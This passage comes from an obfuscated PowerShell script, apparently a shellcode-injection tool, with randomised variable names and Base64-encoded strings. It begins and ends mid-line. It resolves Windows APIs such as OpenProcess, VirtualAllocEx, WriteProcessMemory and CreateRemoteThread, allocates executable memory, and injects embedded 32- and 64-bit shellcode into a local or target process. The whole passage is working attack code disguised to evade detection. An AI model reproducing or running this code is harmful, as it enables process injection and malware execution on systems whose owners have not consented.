${84781afc1aa84b9f8e5fdf7b5b0069c1}.DefineConstructor($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgBUAFMAcABlAGMAaQBhAGwATgBhAG0AZQAsACAASABpAGQAZQBCAHkAUwBpAGcALAAgAFAAdQBiAGwAaQBjAA=='))), [System.Reflection.CallingConventions]::Standard, ${bb080aeaa9c14dd289ca1d3b20e4fda6}) 95 | ${7679f70a96684b37801aad08b7b7d4ee}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA=')))) 96 | ${00f967a230144148a5ecd0548fad806b} = ${84781afc1aa84b9f8e5fdf7b5b0069c1}.DefineMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAbwBrAGUA'))), $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAB1AGIAbABpAGMALAAgAEgAaQBkAGUAQgB5AFMAaQBnACwAIABOAGUAdwBTAGwAbwB0ACwAIABWAGkAcgB0AHUAYQBsAA=='))), ${da743f05712e4f02a41b906b7a9388d4}, ${bb080aeaa9c14dd289ca1d3b20e4fda6}) 97 | ${00f967a230144148a5ecd0548fad806b}.SetImplementationFlags($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UgB1AG4AdABpAG0AZQAsACAATQBhAG4AYQBnAGUAZAA=')))) 98 | echo ${84781afc1aa84b9f8e5fdf7b5b0069c1}.CreateType() 99 | } 100 | function Local:Get-ProcAddress 101 | { 102 | Param 103 | ( 104 | [OutputType([IntPtr])] 105 | [Parameter( Position = 0, Mandatory = $True )] 106 | [String] 107 | ${bd379c865c084d63926b29e274d13c57}, 108 | [Parameter( Position = 1, Mandatory = $True )] 109 | [String] 110 | ${bc83db2988b24a899decd06f5ce0dc17} 111 | ) 112 | ${a86fee8214b64e148362d3df44da8af8} = [AppDomain]::CurrentDomain.GetAssemblies() | 113 | ? { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) } 114 | ${4813ce3f11724d888b9117e371746ba0} = ${a86fee8214b64e148362d3df44da8af8}.GetType($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIALgBVAG4AcwBhAGYAZQBOAGEAdABpAHYAZQBNAGUAdABoAG8AZABzAA==')))) 115 | ${7c4b9679d1684198b7ce9140b9f0bd99} = ${4813ce3f11724d888b9117e371746ba0}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUA')))) 116 | ${e3ff860698774c5e9d02353020ef9981} = ${4813ce3f11724d888b9117e371746ba0}.GetMethod($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBlAHQAUAByAG8AYwBBAGQAZAByAGUAcwBzAA==')))) 117 | ${d99b5df878d84ee3bc4365ce54168944} = ${7c4b9679d1684198b7ce9140b9f0bd99}.Invoke($null, @(${bd379c865c084d63926b29e274d13c57})) 118 | ${d97b10151d0445c58cd2ea9b89a144be} = New-Object IntPtr 119 | ${bd92edae7eb847bc959746f3df013e1a} = New-Object System.Runtime.InteropServices.HandleRef(${d97b10151d0445c58cd2ea9b89a144be}, ${d99b5df878d84ee3bc4365ce54168944}) 120 | echo ${e3ff860698774c5e9d02353020ef9981}.Invoke($null, @([System.Runtime.InteropServices.HandleRef]${bd92edae7eb847bc959746f3df013e1a}, ${bc83db2988b24a899decd06f5ce0dc17})) 121 | } 122 | function Local:Emit-CallThreadStub ([IntPtr] ${e3d140623c6145739659a574f66ba0df}, [IntPtr] ${ba243e174cbe490f95dbdf6afb87d6a5}, [Int] ${af758dacc80d4df9aee6c34c5e3ff606}) 123 | { 124 | ${a1ead47639d84c6abd3d3b5d395e5113} = ${af758dacc80d4df9aee6c34c5e3ff606} / 8 125 | function Local:ConvertTo-LittleEndian ([IntPtr] ${abe88355e36649e294f6146033fa00d2}) 126 | { 127 | ${cad64f9475e44f37aedc857432a529ea} = New-Object Byte[](0) 128 | ${abe88355e36649e294f6146033fa00d2}.ToString("X$(${a1ead47639d84c6abd3d3b5d395e5113}*2)") -split $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KABbAEEALQBGADAALQA5AF0AewAyAH0AKQA='))) | % { if ($_) { ${cad64f9475e44f37aedc857432a529ea} += [Byte] ($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MAB4AHsAMAB9AA=='))) -f $_) } } 129 | [System.Array]::Reverse(${cad64f9475e44f37aedc857432a529ea}) 130 | echo ${cad64f9475e44f37aedc857432a529ea} 131 | } 132 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = New-Object Byte[](0) 133 | if (${a1ead47639d84c6abd3d3b5d395e5113} -eq 8) 134 | { 135 | [Byte[]] ${d83cbd9f2c8c4fd4b1096659282c3d02} = 0x48,0xB8 136 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${e3d140623c6145739659a574f66ba0df} 137 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 138 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x6A,0x00 139 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x48,0xB8 140 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${ba243e174cbe490f95dbdf6afb87d6a5} 141 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 142 | } 143 | else 144 | { 145 | [Byte[]] ${d83cbd9f2c8c4fd4b1096659282c3d02} = 0xB8 146 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${e3d140623c6145739659a574f66ba0df} 147 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 148 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0x6A,0x00 149 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xB8 150 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += ConvertTo-LittleEndian ${ba243e174cbe490f95dbdf6afb87d6a5} 151 | ${d83cbd9f2c8c4fd4b1096659282c3d02} += 0xFF,0xD0 152 | } 153 | echo ${d83cbd9f2c8c4fd4b1096659282c3d02} 154 | } 155 | function Local:Inject-RemoteShellcode ([Int] ${a1c827e2c0ed4a4889805491350137e2}) 156 | { 157 | ${bbc927d3e9464169bdc8c8a1c5319604} = ${3ebe29a2fe6b4585ae05f269775ede9e}.Invoke(0x001F0FFF, $false, ${a1c827e2c0ed4a4889805491350137e2}) 158 | if (!${bbc927d3e9464169bdc8c8a1c5319604}) 159 | { 160 | Throw "Unable to open a process handle for PID: ${a1c827e2c0ed4a4889805491350137e2}" 161 | } 162 | ${e96f52ccbbef4b70a8b15f725b641527} = $false 163 | if (${9c25a4ee2a114bf3b84fe7037b5b0ae3}) 164 | { 165 | ${8b1effb44a8745ef8806e93313dfd2c9}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [Ref] ${e96f52ccbbef4b70a8b15f725b641527}) | Out-Null 166 | if ((!${e96f52ccbbef4b70a8b15f725b641527}) -and ${a14e3c15a6454971b8418282b187db76}) 167 | { 168 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAHQAYQByAGcAZQB0AGkAbgBnACAAYQAgADYANAAtAGIAaQB0ACAAcAByAG8AYwBlAHMAcwAgAGYAcgBvAG0AIAAzADIALQBiAGkAdAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIABpAHMAIABuAG8AdAAgAHMAdQBwAHAAbwByAHQAZQBkAC4AIABVAHMAZQAgAHQAaABlACAANgA0AC0AYgBpAHQAIAB2AGUAcgBzAGkAbwBuACAAbwBmACAAUABvAHcAZQByAHMAaABlAGwAbAAgAGkAZgAgAHkAbwB1ACAAdwBhAG4AdAAgAHQAaABpAHMAIAB0AG8AIAB3AG8AcgBrAC4A'))) 169 | } 170 | elseif (${e96f52ccbbef4b70a8b15f725b641527}) 171 | { 172 | if ($Shellcode32.Length -eq 0) 173 | { 174 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 175 | } 176 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 177 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAGoAZQBjAHQAaQBuAGcAIABpAG4AdABvACAAYQAgAFcAbwB3ADYANAAgAHAAcgBvAGMAZQBzAHMALgA='))) 178 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 179 | } 180 | else 181 | { 182 | if ($Shellcode64.Length -eq 0) 183 | { 184 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADYANAAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 185 | } 186 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode64 187 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAANgA0AC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 188 | } 189 | } 190 | else 191 | { 192 | if ($Shellcode32.Length -eq 0) 193 | { 194 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 195 | } 196 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 197 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 198 | } 199 | ${6bc2b18e42af49ad85011f1b677ce6cb} = ${8db0f45eca4f44feaf866f2cd42efd1b}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x3000, 0x40) 200 | if (!${6bc2b18e42af49ad85011f1b677ce6cb}) 201 | { 202 | Throw "Unable to allocate shellcode memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 203 | } 204 | Write-Verbose "Shellcode memory reserved at 0x$(${6bc2b18e42af49ad85011f1b677ce6cb}.ToString("X$([IntPtr]::Size*2)"))" 205 | ${99cd331d99df48e8ae580253e8b17169}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, ${6bc2b18e42af49ad85011f1b677ce6cb}, ${da05bf47d70e468cb6812c76cc705015}, ${da05bf47d70e468cb6812c76cc705015}.Length, [Ref] 0) | Out-Null 206 | ${ba243e174cbe490f95dbdf6afb87d6a5} = Get-ProcAddress kernel32.dll ExitThread 207 | if (${e96f52ccbbef4b70a8b15f725b641527}) 208 | { 209 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${6bc2b18e42af49ad85011f1b677ce6cb} ${ba243e174cbe490f95dbdf6afb87d6a5} 32 210 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAAMwAyAC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 211 | } 212 | else 213 | { 214 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${6bc2b18e42af49ad85011f1b677ce6cb} ${ba243e174cbe490f95dbdf6afb87d6a5} 64 215 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAANgA0AC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 216 | } 217 | ${037523e80b9f4528980cfbd1bc5de1a2} = ${8db0f45eca4f44feaf866f2cd42efd1b}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length, 0x3000, 0x40) 218 | if (!${037523e80b9f4528980cfbd1bc5de1a2}) 219 | { 220 | Throw "Unable to allocate thread call stub memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 221 | } 222 | Write-Verbose "Thread call stub memory reserved at 0x$(${037523e80b9f4528980cfbd1bc5de1a2}.ToString("X$([IntPtr]::Size*2)"))" 223 | ${99cd331d99df48e8ae580253e8b17169}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, ${037523e80b9f4528980cfbd1bc5de1a2}, ${d83cbd9f2c8c4fd4b1096659282c3d02}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length, [Ref] 0) | Out-Null 224 | ${9fe8c30bc755439cbb6abb5c2095c0f2} = ${9edf6540c07a449d85e95fc37d04768c}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}, [IntPtr]::Zero, 0, ${037523e80b9f4528980cfbd1bc5de1a2}, ${6bc2b18e42af49ad85011f1b677ce6cb}, 0, [IntPtr]::Zero) 225 | if (!${9fe8c30bc755439cbb6abb5c2095c0f2}) 226 | { 227 | Throw "Unable to launch remote thread in PID: ${a1c827e2c0ed4a4889805491350137e2}" 228 | } 229 | ${4d80fc465d0f4c81a9f0510ed4e4a630}.Invoke(${bbc927d3e9464169bdc8c8a1c5319604}) | Out-Null 230 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAGMAbwBtAHAAbABlAHQAZQAhAA=='))) 231 | } 232 | function Local:Inject-LocalShellcode 233 | { 234 | if (${a14e3c15a6454971b8418282b187db76}) { 235 | if ($Shellcode32.Length -eq 0) 236 | { 237 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADMAMgAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 238 | return 239 | } 240 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode32 241 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAAMwAyAC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 242 | } 243 | else 244 | { 245 | if ($Shellcode64.Length -eq 0) 246 | { 247 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TgBvACAAcwBoAGUAbABsAGMAbwBkAGUAIAB3AGEAcwAgAHAAbABhAGMAZQBkACAAaQBuACAAdABoAGUAIAAkAFMAaABlAGwAbABjAG8AZABlADYANAAgAHYAYQByAGkAYQBiAGwAZQAhAA=='))) 248 | return 249 | } 250 | ${da05bf47d70e468cb6812c76cc705015} = $Shellcode64 251 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBzAGkAbgBnACAANgA0AC0AYgBpAHQAIABzAGgAZQBsAGwAYwBvAGQAZQAuAA=='))) 252 | } 253 | ${b988be9001884bb6a7ea7d43e22fbecc} = ${eb933ced95a944428b16abca963b8087}.Invoke([IntPtr]::Zero, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x3000, 0x40) 254 | if (!${b988be9001884bb6a7ea7d43e22fbecc}) 255 | { 256 | Throw "Unable to allocate shellcode memory in PID: ${a1c827e2c0ed4a4889805491350137e2}" 257 | } 258 | Write-Verbose "Shellcode memory reserved at 0x$(${b988be9001884bb6a7ea7d43e22fbecc}.ToString("X$([IntPtr]::Size*2)"))" 259 | [System.Runtime.InteropServices.Marshal]::Copy(${da05bf47d70e468cb6812c76cc705015}, 0, ${b988be9001884bb6a7ea7d43e22fbecc}, ${da05bf47d70e468cb6812c76cc705015}.Length) 260 | ${ba243e174cbe490f95dbdf6afb87d6a5} = Get-ProcAddress kernel32.dll ExitThread 261 | if (${a14e3c15a6454971b8418282b187db76}) 262 | { 263 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${b988be9001884bb6a7ea7d43e22fbecc} ${ba243e174cbe490f95dbdf6afb87d6a5} 32 264 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAAMwAyAC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 265 | } 266 | else 267 | { 268 | ${d83cbd9f2c8c4fd4b1096659282c3d02} = Emit-CallThreadStub ${b988be9001884bb6a7ea7d43e22fbecc} ${ba243e174cbe490f95dbdf6afb87d6a5} 64 269 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RQBtAGkAdAB0AGkAbgBnACAANgA0AC0AYgBpAHQAIABhAHMAcwBlAG0AYgBsAHkAIABjAGEAbABsACAAcwB0AHUAYgAuAA=='))) 270 | } 271 | ${d9667c5c1e8f43f8afda84bd01ba4a29} = ${eb933ced95a944428b16abca963b8087}.Invoke([IntPtr]::Zero, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length + 1, 0x3000, 0x40) 272 | if (!${d9667c5c1e8f43f8afda84bd01ba4a29}) 273 | { 274 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABhAGwAbABvAGMAYQB0AGUAIAB0AGgAcgBlAGEAZAAgAGMAYQBsAGwAIABzAHQAdQBiAC4A'))) 275 | } 276 | Write-Verbose "Thread call stub memory reserved at 0x$(${d9667c5c1e8f43f8afda84bd01ba4a29}.ToString("X$([IntPtr]::Size*2)"))" 277 | [System.Runtime.InteropServices.Marshal]::Copy(${d83cbd9f2c8c4fd4b1096659282c3d02}, 0, ${d9667c5c1e8f43f8afda84bd01ba4a29}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length) 278 | ${9fe8c30bc755439cbb6abb5c2095c0f2} = ${56bc5f168ce04046907a2bb4ffc2497f}.Invoke([IntPtr]::Zero, 0, ${d9667c5c1e8f43f8afda84bd01ba4a29}, ${b988be9001884bb6a7ea7d43e22fbecc}, 0, [IntPtr]::Zero) 279 | if (!${9fe8c30bc755439cbb6abb5c2095c0f2}) 280 | { 281 | Throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABsAGEAdQBuAGMAaAAgAHQAaAByAGUAYQBkAC4A'))) 282 | } 283 | ${590b2e0764d34d65ba757e59bd6b00b4}.Invoke(${9fe8c30bc755439cbb6abb5c2095c0f2}, 0xFFFFFFFF) | Out-Null 284 | ${711707a94e3e4d0cb26eba626fed37bc}.Invoke(${d9667c5c1e8f43f8afda84bd01ba4a29}, ${d83cbd9f2c8c4fd4b1096659282c3d02}.Length + 1, 0x8000) | Out-Null 285 | ${711707a94e3e4d0cb26eba626fed37bc}.Invoke(${b988be9001884bb6a7ea7d43e22fbecc}, ${da05bf47d70e468cb6812c76cc705015}.Length + 1, 0x8000) | Out-Null 286 | Write-Verbose $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUAIABpAG4AagBlAGMAdABpAG8AbgAgAGMAbwBtAHAAbABlAHQAZQAhAA=='))) 287 | } 288 | ${ad094e774331414aa822a80ef498872c} = Get-ProcAddress kernel32.dll IsWow64Process 289 | ${4c47f327f7344dbba8ad92d5e80a8255} = $null 290 | try { 291 | ${4c47f327f7344dbba8ad92d5e80a8255} = @(gwmi -Query $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBFAEwARQBDAFQAIABBAGQAZAByAGUAcwBzAFcAaQBkAHQAaAAgAEYAUgBPAE0AIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgA='))))[0] | select -ExpandProperty AddressWidth 292 | } catch { 293 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VQBuAGEAYgBsAGUAIAB0AG8AIABkAGUAdABlAHIAbQBpAG4AZQAgAE8AUwAgAHAAcgBvAGMAZQBzAHMAbwByACAAYQBkAGQAcgBlAHMAcwAgAHcAaQBkAHQAaAAuAA=='))) 294 | } 295 | switch (${4c47f327f7344dbba8ad92d5e80a8255}) { 296 | '32' { 297 | ${9c25a4ee2a114bf3b84fe7037b5b0ae3} = $False 298 | } 299 | '64' { 300 | ${9c25a4ee2a114bf3b84fe7037b5b0ae3} = $True 301 | ${f799f54c46b24705bc8fbe41d173eb3d} = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool]) 302 | ${8b1effb44a8745ef8806e93313dfd2c9} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${ad094e774331414aa822a80ef498872c}, ${f799f54c46b24705bc8fbe41d173eb3d}) 303 | } 304 | default { 305 | throw $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SQBuAHYAYQBsAGkAZAAgAE8AUwAgAGEAZABkAHIAZQBzAHMAIAB3AGkAZAB0AGgAIABkAGUAdABlAGMAdABlAGQALgA='))) 306 | } 307 | } 308 | if ([IntPtr]::Size -eq 4) 309 | { 310 | ${a14e3c15a6454971b8418282b187db76} = $true 311 | } 312 | else 313 | { 314 | ${a14e3c15a6454971b8418282b187db76} = $false 315 | } 316 | if ($PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBoAGUAbABsAGMAbwBkAGUA')))]) 317 | { 318 | [Byte[]] $Shellcode32 = ${da05bf47d70e468cb6812c76cc705015} 319 | [Byte[]] $Shellcode64 = $Shellcode32 320 | } 321 | else 322 | { 323 | [Byte[]] $Shellcode32 = @(0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b, 324 | 0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0, 325 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57, 326 | 0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01, 327 | 0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b, 328 | 0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4, 329 | 0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b, 330 | 0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24, 331 | 0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d, 332 | 0x6a,0x01,0x8d,0x85,0xb9,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,0x87,0xff,0xd5, 333 | 0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x3c,0x06,0x7c,0x0a, 334 | 0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,0x00,0x53,0xff,0xd5,0x63, 335 | 0x61,0x6c,0x63,0x00) 336 | [Byte[]] $Shellcode64 = @(0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51, 337 | 0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52, 338 | 0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0, 339 | 0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed, 340 | 0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x8b,0x80,0x88, 341 | 0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,0x48,0x18,0x44, 342 | 0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48, 343 | 0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1, 344 | 0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44, 345 | 0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49, 346 | 0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a, 347 | 0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41, 348 | 0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00, 349 | 0x00,0x00,0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b, 350 | 0x6f,0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff, 351 | 0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47, 352 | 0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x63,0x61,0x6c,0x63,0x00) 353 | } 354 | if ( $PSBoundParameters[$([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UAByAG8AYwBlAHMAcwBJAEQA')))] ) 355 | { 356 | ${91ebd867fd9541d387fab6fae69d1457} = Get-ProcAddress kernel32.dll OpenProcess 357 | ${4dc2fb1f85e245eaac068c68c51d77bd} = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr]) 358 | ${3ebe29a2fe6b4585ae05f269775ede9e} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${91ebd867fd9541d387fab6fae69d1457}, ${4dc2fb1f85e245eaac068c68c51d77bd}) 359 | ${c4eebcbe613d4b89b02665f9d5a8e2e7} = Get-ProcAddress kernel32.dll VirtualAllocEx 360 | ${52e3718fd2c04b34b2c24b0caef110ef} = Get-DelegateType @([IntPtr], [IntPtr], [Uint32], [UInt32], [UInt32]) ([IntPtr]) 361 | ${8db0f45eca4f44feaf866f2cd42efd1b} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${c4eebcbe613d4b89b02665f9d5a8e2e7}, ${52e3718fd2c04b34b2c24b0caef110ef}) 362 | ${ad4947a83c084cd980c637bffd04e08d} = Get-ProcAddress kernel32.dll WriteProcessMemory 363 | ${928724ecfd9a435394fa6f2562a108a3} = Get-DelegateType @([IntPtr], [IntPtr], [Byte[]], [UInt32], [UInt32].MakeByRefType()) ([Bool]) 364 | ${99cd331d99df48e8ae580253e8b17169} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${ad4947a83c084cd980c637bffd04e08d}, ${928724ecfd9a435394fa6f2562a108a3}) 365 | ${c0f03151a5b9489b9d0b106ee62ff1ee} = Get-ProcAddress kernel32.dll CreateRemoteThread 366 | ${7ba2f1c0231c4175ab350ae21b51a1a1} = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]) 367 | ${9edf6540c07a449d85e95fc37d04768c} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${c0f03151a5b9489b9d0b106ee62ff1ee}, ${7ba2f1c0231c4175ab350ae21b51a1a1}) 368 | ${04197b3fa4c841028b83c0b2a2a31177} = Get-ProcAddress kernel32.dll CloseHandle 369 | ${b77576c257d745d998c14c925f7a5522} = Get-DelegateType @([IntPtr]) ([Bool]) 370 | ${4d80fc465d0f4c81a9f0510ed4e4a630} = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(${04197b3fa4c841028b83c0b2a2a31177}, ${b77576c257d745d998c14c925f7a5522}) 371 | Write-Verbose "Injecting 